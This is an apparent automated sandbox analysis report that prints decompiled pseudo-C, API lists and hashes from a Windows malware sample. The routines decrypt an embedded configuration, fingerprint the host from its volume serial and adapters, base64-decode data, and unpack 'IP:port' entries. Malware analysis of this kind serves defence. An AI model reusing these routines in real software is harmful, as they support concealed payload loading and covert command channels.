                                                                                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x0400451a
                                                                                                                                                                                                                                                                                          0x04004522
                                                                                                                                                                                                                                                                                          0x040047e6
                                                                                                                                                                                                                                                                                          0x040047ed
                                                                                                                                                                                                                                                                                          0x04004532
                                                                                                                                                                                                                                                                                          0x04004556
                                                                                                                                                                                                                                                                                          0x0400455b
                                                                                                                                                                                                                                                                                          0x0400456c
                                                                                                                                                                                                                                                                                          0x0400458b
                                                                                                                                                                                                                                                                                          0x04004591
                                                                                                                                                                                                                                                                                          0x0400459e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040045b3
                                                                                                                                                                                                                                                                                          0x040045c0
                                                                                                                                                                                                                                                                                          0x040047d0
                                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                                          0x040045d6
                                                                                                                                                                                                                                                                                          0x040045dc
                                                                                                                                                                                                                                                                                          0x040045e9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040045ef
                                                                                                                                                                                                                                                                                          0x04004617
                                                                                                                                                                                                                                                                                          0x0400461f
                                                                                                                                                                                                                                                                                          0x040047a9
                                                                                                                                                                                                                                                                                          0x040047b0
                                                                                                                                                                                                                                                                                          0x040047c0
                                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004637
                                                                                                                                                                                                                                                                                          0x0400463e
                                                                                                                                                                                                                                                                                          0x04004644
                                                                                                                                                                                                                                                                                          0x04004660
                                                                                                                                                                                                                                                                                          0x04004665
                                                                                                                                                                                                                                                                                          0x0400466d
                                                                                                                                                                                                                                                                                          0x0400467f
                                                                                                                                                                                                                                                                                          0x0400468f
                                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                                          0x040046a8
                                                                                                                                                                                                                                                                                          0x040046c2
                                                                                                                                                                                                                                                                                          0x040046c8
                                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                                          0x0400470f
                                                                                                                                                                                                                                                                                          0x0400473b
                                                                                                                                                                                                                                                                                          0x0400476b
                                                                                                                                                                                                                                                                                          0x0400473d
                                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                                          0x04004777
                                                                                                                                                                                                                                                                                          0x0400478f
                                                                                                                                                                                                                                                                                          0x04004794
                                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                                          0x040046dd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                                          0x0400461f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400468F
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2585753175-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                                          • Instruction ID: c94ea80790bf0b6d8dbf2583483555f7aa9864fa89971da120b97b62dce4532c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92815D74A056189BEB64CF14DC94BAAB7B4AF49306F0091D9E608BB2C1D774ABC1CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                          			E04009D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                                          				intOrPtr _v296;
                                                                                                                                                                                                                                                                                          				char _v404;
                                                                                                                                                                                                                                                                                          				long _v408;
                                                                                                                                                                                                                                                                                          				char _v673;
                                                                                                                                                                                                                                                                                          				char _v676;
                                                                                                                                                                                                                                                                                          				intOrPtr _v680;
                                                                                                                                                                                                                                                                                          				long _v684;
                                                                                                                                                                                                                                                                                          				signed int _v688;
                                                                                                                                                                                                                                                                                          				short* _v692;
                                                                                                                                                                                                                                                                                          				signed int _v696;
                                                                                                                                                                                                                                                                                          				unsigned int _v700;
                                                                                                                                                                                                                                                                                          				intOrPtr _v704;
                                                                                                                                                                                                                                                                                          				char _v900;
                                                                                                                                                                                                                                                                                          				signed int _v904;
                                                                                                                                                                                                                                                                                          				signed int _v908;
                                                                                                                                                                                                                                                                                          				int _v912;
                                                                                                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                                          				short** _t76;
                                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                                          					_v12 = 0x20;
                                                                                                                                                                                                                                                                                          					_v24 = 6;
                                                                                                                                                                                                                                                                                          					_v684 = 0;
                                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                                          					_v408 = 0;
                                                                                                                                                                                                                                                                                          					_v16 = 0x19660d;
                                                                                                                                                                                                                                                                                          					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                                                          					_v680 = _a4;
                                                                                                                                                                                                                                                                                          					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                                                          						_v673 = 0;
                                                                                                                                                                                                                                                                                          						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                                                          						if(_t71 != 0) {
                                                                                                                                                                                                                                                                                          							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                                                          							E04007D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                                                          							_v700 = 0;
                                                                                                                                                                                                                                                                                          							_t74 = E04009F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                                                          							if(_t74 != 0) {
                                                                                                                                                                                                                                                                                          								_v904 = 0;
                                                                                                                                                                                                                                                                                          								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                                                          									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                                                          									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v696 = _v684;
                                                                                                                                                                                                                                                                                          							_v908 = 0;
                                                                                                                                                                                                                                                                                          							while(_v908 < 4) {
                                                                                                                                                                                                                                                                                          								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                                                          								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                                                          								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t76 =  &_v692;
                                                                                                                                                                                                                                                                                          							__imp__StringFromCLSID(_a4, _t76); // executed
                                                                                                                                                                                                                                                                                          							_v704 = _t76;
                                                                                                                                                                                                                                                                                          							if(_v704 >= 0) {
                                                                                                                                                                                                                                                                                          								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                                                          								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}





























                                                                                                                                                                                                                                                                                          0x04009d29
                                                                                                                                                                                                                                                                                          0x04009d31
                                                                                                                                                                                                                                                                                          0x04009d4b
                                                                                                                                                                                                                                                                                          0x04009d52
                                                                                                                                                                                                                                                                                          0x04009d59
                                                                                                                                                                                                                                                                                          0x04009d63
                                                                                                                                                                                                                                                                                          0x04009d6a
                                                                                                                                                                                                                                                                                          0x04009d74
                                                                                                                                                                                                                                                                                          0x04009d7b
                                                                                                                                                                                                                                                                                          0x04009d88
                                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                                          0x04009da8
                                                                                                                                                                                                                                                                                          0x04009ddd
                                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                                          0x04009deb
                                                                                                                                                                                                                                                                                          0x04009e03
                                                                                                                                                                                                                                                                                          0x04009e0b
                                                                                                                                                                                                                                                                                          0x04009e28
                                                                                                                                                                                                                                                                                          0x04009e32
                                                                                                                                                                                                                                                                                          0x04009e34
                                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                                          0x04009e73
                                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                                          0x04009e81
                                                                                                                                                                                                                                                                                          0x04009e87
                                                                                                                                                                                                                                                                                          0x04009ea2
                                                                                                                                                                                                                                                                                          0x04009ecf
                                                                                                                                                                                                                                                                                          0x04009ee4
                                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                                          0x04009eec
                                                                                                                                                                                                                                                                                          0x04009ef7
                                                                                                                                                                                                                                                                                          0x04009efd
                                                                                                                                                                                                                                                                                          0x04009f0a
                                                                                                                                                                                                                                                                                          0x04009f2b
                                                                                                                                                                                                                                                                                          0x04009f46
                                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                                          0x04009f63

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009F70: GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                                          • StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 04009F25
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 04009F46
                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 04009F57
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                                          • Instruction ID: 5e89223982a4db5088977870fe710af53f8bde251be69ccbe6f0708d183867dd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 695139B0A043189FEB25CF50CC88BEAB7B9BB44304F14C2D9E5096A281DB74AB84CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04001390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				signed char* _v8;
                                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                                          				long _v32;
                                                                                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t52 = __eax;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                                          					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                                                          					_v28 = _t57;
                                                                                                                                                                                                                                                                                          					if(_v28 != 0) {
                                                                                                                                                                                                                                                                                          						E04007B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                                                          						E04007B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                                                          						_v8 = _v28;
                                                                                                                                                                                                                                                                                          						_v20 = 3;
                                                                                                                                                                                                                                                                                          						while(_v20 == 3) {
                                                                                                                                                                                                                                                                                          							_v32 = 0;
                                                                                                                                                                                                                                                                                          							while(_v32 < 4) {
                                                                                                                                                                                                                                                                                          								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                                                          									_t76 = E04001500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                                                          									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                                          									if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                                                          								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                                          								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t64 = E04001580( &_v16,  &_v12);
                                                                                                                                                                                                                                                                                          							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                                                          							_v20 = _t64;
                                                                                                                                                                                                                                                                                          							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                                                          								E04007B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                                                          								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                                                          								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                                                          								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                                                          								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						RtlFreeHeap(GetProcessHeap(), 0, _v28); // executed
                                                                                                                                                                                                                                                                                          						return _v24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                                          0x04001390
                                                                                                                                                                                                                                                                                          0x0400139a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                                          0x040013cd
                                                                                                                                                                                                                                                                                          0x040013d3
                                                                                                                                                                                                                                                                                          0x040013da
                                                                                                                                                                                                                                                                                          0x040013f0
                                                                                                                                                                                                                                                                                          0x04001406
                                                                                                                                                                                                                                                                                          0x0400140b
                                                                                                                                                                                                                                                                                          0x04001411
                                                                                                                                                                                                                                                                                          0x04001414
                                                                                                                                                                                                                                                                                          0x0400141b
                                                                                                                                                                                                                                                                                          0x04001425
                                                                                                                                                                                                                                                                                          0x04001437
                                                                                                                                                                                                                                                                                          0x0400143d
                                                                                                                                                                                                                                                                                          0x0400144f
                                                                                                                                                                                                                                                                                          0x04001454
                                                                                                                                                                                                                                                                                          0x04001459
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                                          0x0400146e
                                                                                                                                                                                                                                                                                          0x04001478
                                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                                          0x04001485
                                                                                                                                                                                                                                                                                          0x0400148a
                                                                                                                                                                                                                                                                                          0x0400148d
                                                                                                                                                                                                                                                                                          0x04001496
                                                                                                                                                                                                                                                                                          0x040014bc
                                                                                                                                                                                                                                                                                          0x040014c1
                                                                                                                                                                                                                                                                                          0x040014ca
                                                                                                                                                                                                                                                                                          0x040014d3
                                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040014ab
                                                                                                                                                                                                                                                                                          0x040014f1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040014f7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040013dc

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 040013C6
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 040013CD
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0400149E
                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 040014A5
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 040014EA
                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 040014F1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                                          • String ID: ====
                                                                                                                                                                                                                                                                                          • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                                                          • Opcode ID: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                                          • Instruction ID: c6e28297ba35799b7f22f7dab3aca0fae7ec72587fc4187f79a8e8c8e7655232
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7414CB5D04209EBEB04DFA4C884BEE7BB5FF44309F108619E515BB2D0D735AA45CB92
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                          			E04007970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                                                                          				intOrPtr _t83;
                                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					_v16 = 0x8c;
                                                                                                                                                                                                                                                                                          					_v20 = 0x75bc;
                                                                                                                                                                                                                                                                                          					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t50;
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_t72 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                                          						_t83 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          						_t52 = E0400A400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                                                          						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                                                          						_v24 = _t52;
                                                                                                                                                                                                                                                                                          						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                                                          							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                                                          							_t58 = E04008A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x40130e8, 0x254);
                                                                                                                                                                                                                                                                                          							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                                                          							if(_t58 != 0) {
                                                                                                                                                                                                                                                                                          								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                                                          								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
                                                                                                                                                                                                                                                                                          								if(_v40 != 0) {
                                                                                                                                                                                                                                                                                          									_v48 = 0;
                                                                                                                                                                                                                                                                                          									while(_v48 < _v36) {
                                                                                                                                                                                                                                                                                          										_t64 = E04007B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                                                          										_push(_v44);
                                                                                                                                                                                                                                                                                          										L0400B1EC();
                                                                                                                                                                                                                                                                                          										_v52 = _t64;
                                                                                                                                                                                                                                                                                          										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
